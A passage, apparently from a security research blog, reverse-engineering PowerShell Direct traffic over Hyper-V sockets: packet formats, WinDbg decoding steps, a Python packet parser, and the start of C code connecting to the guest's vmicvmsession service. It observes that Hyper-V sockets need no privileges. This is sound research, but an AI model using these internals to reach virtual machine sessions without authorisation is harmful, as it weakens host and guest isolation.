<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> streamType.ToString(), - </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Default</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> PS_OUT_OF_PROC_PSGUID_ATTRIBUTE, - </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PSGUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> psGuid.ToString(), - </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">223adb3d-b639-4e84-aa83-6b193db87e1e</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Convert</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.ToBase64String(data)); - </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">BASE64 text</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">return</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> result; </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Packet header variants:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="123" src="https://lh6.googleusercontent.com/PbFq_tX0W-T-wf2TsaiE9CHaP1jmnDfqn0e63GuYnV9YTL7_y4977mQKiwPhVcizpsjN9PX_-DGlgHp1MKeF_-sCJbcddyDDpdRiH2QRY3E0eTO-DeeIvrcVkSX5IsaRMT-gIhs4V2TT_ixQoA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="355" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For instance, if we open a PowerShell Direct session and execute the command “mkdir C:\Tools\Test” in the guest OS, the text part of the dialogue looks as follows:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="90" src="https://lh3.googleusercontent.com/SrjReqhf68Pm_q0zGMcHgPkPrykPH-bds23Ao3zGOTySXbiF2Z7b7MGoUwqB0RATd_PmHCUAHHTQDH9OzLsrgTHZx55qOkbdFOp5heQ2VStyUbZE2cvTemna_MBo1KEFQ2lYZETOldicSkbIVQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="304" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The dialogue scheme: the root OS sends several XML messages, one of which contains the command</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="122" src="https://lh4.googleusercontent.com/K_ZQmrA-yZjIhE6fL6VwXy65xCiCaHWnhfFyG1Evhy82ziTDwlJi8kaREovaNo-pkeMuhYD-aTx_5L4ZITztQoZUNCrsWVbsEvI6CuUtvLToJ4qwdSPpRGf8BjcyK1zwtS6JzUsyfC1fCbLTyw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="396" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">And its arguments:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="119" src="https://lh3.googleusercontent.com/sfriuadsOeJz36NE0ubwn1OvjuPpB_iB4umn4axjI6TSq9ytJSds9KHHCN2bltHjgwTBT8E88vrhRQ71lN66lInIGcAc2OchjrdF_QVfx8pImh5nRLuvh12RjSoAX3kNmUGwP-4xOfDKfIjG2Q" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="229" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The guest OS returns several messages which, besides service information, contain the results of command execution (every line of the mkdir command's output is transferred as a separate object):</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="87" src="https://lh5.googleusercontent.com/ql23EgV13j7-Ih2El3rP9E4oJFE6Af5ZfMdlZj32Rs0_GZ54FHb4WDAst1geMZxI__c17roO5GW36Y5khowtDgXi64k6cEzI3GGfxYvR9wHK_Qv1osuzCDasxoHzw4i-5OVVw5N-FTdmcXd1Ig" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="221" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="46" src="https://lh6.googleusercontent.com/v2v8m9F2CYItvT7Wshqbe5hqXD90mxWeVIYcjZ3ZS1aivI77nOVPr1TQbGYfWfNyGs8LM6uhzHbdWGo9wtz1wqbH2ct_-Q_TGixGW0JW4HVwMPMc8a4cvyNaiVLrXjaXCx23kcP4Alw0lXToYw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="333" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="29" src="https://lh4.googleusercontent.com/KOQbqu7gDjEpodm2Nz9D24YD1DEJe-bBt3tVIA0adneXBw6FKe9_tt8qrI4CbquYj-6VXWErMIX2T1TqN645oayeeQJox-GyWEnuvG863Zm_ebKPjbEqfIoFD8Ms3J3vxbJl39aoFlkVv0O0QA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="338" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In principle, the decoded data can be obtained by setting a breakpoint on System.Management.Automation.Remoting.Client.OutOfProcessClientCommandTransportManager.SendData (the address can be found using !clrstack). When we stop at that point, we execute !clrstack -a and obtain the address of </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">data</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0:020> !clrstack -a</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">OS Thread Id: 0x3b8 (20)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">………………………</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> PARAMETERS:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> this (<CLR reg>) = 0x000001e0a8459060</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">data</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (<CLR reg>) = </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0x000001e0a84964b0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> priorityType (<CLR reg>) = 0x0000000000000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The buffer size can be found out with:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0:020> !DumpObj /d 000001e0a84964b0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Name: System.Byte[]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MethodTable: 00007ffc081993d0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">EEClass: 00007ffc07bd4dc8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Size: 2219(0x8ab) bytes</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When we execute </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">dc </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">in WinDbg, we can see the message contents:</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="154" src="https://lh4.googleusercontent.com/6bzVcXd_KUIEw51Lfuf1WGjr0Cpxk67AuQZZUDNwcXIxkP4T6O8SZ3mj567VYLcHVT9yXwHJMBrFnJdSibO1upsHvNdq0kG_cNXGjg5jw7d5W4AoBCiCAy62LkRh7iY2hqRwKJFJUi0gcTosTw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="260" /></span></div>
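<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As an added example (not code from the original post or from PowerShell), the following Python builds and decodes the Data packets described above and goes one level deeper than the page by unpacking the PSRP fragment carried in the base64 body, so a captured PowerShell Direct exchange can be logged with its message type. The tag and attribute names come from the annotated C# fragment; the header-only tag set, the fragment and message layout and the message-type values are assumptions taken from PowerShell's OutOfProcessUtils and MS-PSRP, the PSGuid is the value shown on the page, and the other GUIDs and the payload are constructed.</span></div>

```python
# Added example (not from the post or from PowerShell): build/decode PowerShell Direct
# out-of-process packets and the PSRP fragment inside; layout assumed from MS-PSRP 2.2.4/2.2.1.
import base64
import struct
import uuid
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import Optional

# Tag/attribute names annotated beside the string.Format call on the page.
PS_OUT_OF_PROC_DATA_TAG = "Data"
PS_OUT_OF_PROC_STREAM_ATTRIBUTE = "Stream"
PS_OUT_OF_PROC_PSGUID_ATTRIBUTE = "PSGuid"
# Header-only packets look like "<Tag PSGuid='...' />". Assumption: tag set taken
# from PowerShell's OutOfProcessUtils (the page only shows them as a screenshot).
HEADER_ONLY_TAGS = {"DataAck", "Command", "CommandAck", "Close", "CloseAck",
                    "Signal", "SignalAck"}
# Subset of PSRP message types (assumption: values from MS-PSRP section 2.2.1).
MESSAGE_TYPES = {0x00010002: "SESSION_CAPABILITY", 0x00010004: "INIT_RUNSPACEPOOL",
                 0x00021002: "RUNSPACEPOOL_STATE", 0x00021006: "CREATE_PIPELINE",
                 0x00041004: "PIPELINE_OUTPUT", 0x00041006: "PIPELINE_STATE"}
FRAGMENT_START = 0x01  # S bit: first fragment of an object
FRAGMENT_END = 0x02    # E bit: last fragment of an object
FRAGMENT_HEADER = struct.Struct(">QQBI")  # ObjectId, FragmentId, Flags, BlobLength (big-endian)
MESSAGE_HEADER = struct.Struct("<II")     # Destination, MessageType (little-endian); then RPID, PID

@dataclass
class OutOfProcPacket:
    tag: str
    ps_guid: uuid.UUID
    stream: Optional[str] = None     # only Data packets name a stream
    payload: Optional[bytes] = None  # decoded base64 body of a Data packet

@dataclass
class PsrpFragment:
    object_id: int
    fragment_id: int
    start: bool
    end: bool
    destination: int  # 1 = client, 2 = server
    message_type: int
    rpid: uuid.UUID   # runspace pool id
    pid: uuid.UUID    # pipeline id (all zeros for runspace-pool level messages)
    data: bytes       # CLIXML message body

def create_data_packet(data: bytes, stream_type: str, ps_guid: uuid.UUID) -> str:
    """Same format string as the C# string.Format call shown on the page."""
    return "<{0} {1}='{2}' {3}='{4}'>{5}</{0}>".format(
        PS_OUT_OF_PROC_DATA_TAG,
        PS_OUT_OF_PROC_STREAM_ATTRIBUTE, stream_type,
        PS_OUT_OF_PROC_PSGUID_ATTRIBUTE, str(ps_guid),
        base64.b64encode(data).decode("ascii"))

def parse_packet(text: str) -> OutOfProcPacket:
    """Split one transport packet into tag, PSGuid, stream name and raw (base64-decoded) payload."""
    root = ET.fromstring(text)
    ps_guid = uuid.UUID(root.attrib[PS_OUT_OF_PROC_PSGUID_ATTRIBUTE])
    if root.tag == PS_OUT_OF_PROC_DATA_TAG:
        body = (root.text or "").strip()
        return OutOfProcPacket(root.tag, ps_guid, root.attrib[PS_OUT_OF_PROC_STREAM_ATTRIBUTE],
                               base64.b64decode(body, validate=True))
    if root.tag in HEADER_ONLY_TAGS:
        return OutOfProcPacket(root.tag, ps_guid)
    raise ValueError(f"unknown out-of-proc packet tag: {root.tag}")

def build_fragment(object_id: int, fragment_id: int, flags: int, destination: int,
                   message_type: int, rpid: uuid.UUID, pid: uuid.UUID, data: bytes) -> bytes:
    """Fragment header, then message header with the two GUIDs in their little-endian wire form."""
    message = MESSAGE_HEADER.pack(destination, message_type) + rpid.bytes_le + pid.bytes_le + data
    return FRAGMENT_HEADER.pack(object_id, fragment_id, flags, len(message)) + message

def parse_fragment(blob: bytes) -> PsrpFragment:
    """Reverse of build_fragment; rejects a blob shorter than its declared length."""
    object_id, fragment_id, flags, length = FRAGMENT_HEADER.unpack_from(blob, 0)
    message = blob[FRAGMENT_HEADER.size:FRAGMENT_HEADER.size + length]
    if len(message) != length or length < 40:
        raise ValueError("truncated fragment")
    destination, message_type = MESSAGE_HEADER.unpack_from(message, 0)
    return PsrpFragment(object_id, fragment_id, bool(flags & FRAGMENT_START),
                        bool(flags & FRAGMENT_END), destination, message_type,
                        uuid.UUID(bytes_le=message[8:24]), uuid.UUID(bytes_le=message[24:40]),
                        message[40:])

def describe_packet(text: str) -> str:
    """One-line summary suitable for logging a captured PowerShell Direct exchange."""
    pkt = parse_packet(text)
    if pkt.payload is None:
        return f"{pkt.tag} PSGuid={pkt.ps_guid}"
    frag = parse_fragment(pkt.payload)
    name = MESSAGE_TYPES.get(frag.message_type, f"0x{frag.message_type:08x}")
    return f"{pkt.tag} Stream={pkt.stream} PSGuid={pkt.ps_guid} {name} {len(frag.data)} bytes"

# Constructed sample, not captured traffic: one CREATE_PIPELINE fragment in a Data packet.
SAMPLE_PSGUID = uuid.UUID("223adb3d-b639-4e84-aa83-6b193db87e1e")  # PSGuid shown on the page
SAMPLE_RPID = uuid.UUID("11111111-2222-3333-4444-555555555555")  # constructed
SAMPLE_BODY = b'<Obj RefId="0"><MS><S N="Cmd">mkdir C:\\Tools\\Test</S></MS></Obj>'  # constructed
SAMPLE_FRAGMENT = build_fragment(1, 0, FRAGMENT_START | FRAGMENT_END, 2, 0x00021006,
                                 SAMPLE_RPID, SAMPLE_PSGUID, SAMPLE_BODY)
SAMPLE_PACKET = create_data_packet(SAMPLE_FRAGMENT, "Default", SAMPLE_PSGUID)
```

Running describe_packet over each line of a captured dialogue gives the tag, stream and PSRP message type of every packet without having to set the SendData breakpoint by hand.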
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The PowerShell Direct description page states that Hyper-V Administrators privileges are required to use it:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="154" src="https://lh5.googleusercontent.com/eFLAp4Zf9gotDrft8qb4VjgOKu93X90U-YX2DQEt-Z4jVK5daqJ8mDaZzbEY8WjKW7PvvhTvb5B3WchBqwbfZ_AQZwp2R0WqyGCfEiq2DUxiB6OX5fXjBiLt_bjmeHm24IVqbbbEpFmTybOuPg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="334" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Actually, these privileges are required to start working with the Enter-PSSession cmdlet. Hyper-V sockets themselves do not require any privileges, so this functionality can be used in applications started by an unprivileged user.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">From the root OS we can connect to the vmicvmsession service. To do that, in the ClientExample.exe application </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">(</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/HyperV-sockets</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">)</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">we replace HV_PARENT_GUID with the GUID of the virtual machine. </span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: #2b91af; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WSADATA</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> wsaData;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SOCKADDR_HV</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> clientService;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CLSID</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> VmID, ServiceID;</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">// Initialize GUIDs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//wchar_t* clsid_str = L"{a42e7cda-d03f-480c-9cc2-a4de20abb878}"; // HV_PARENT_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">wchar_t</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">* clsid_str = </span><span style="background-color: transparent; color: #a31515; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">L"{6a964317-1d87-4a74-abf9-46a69b048900}"</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CLSIDFromString(clsid_str, &VmID);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.449999999999996pt;">
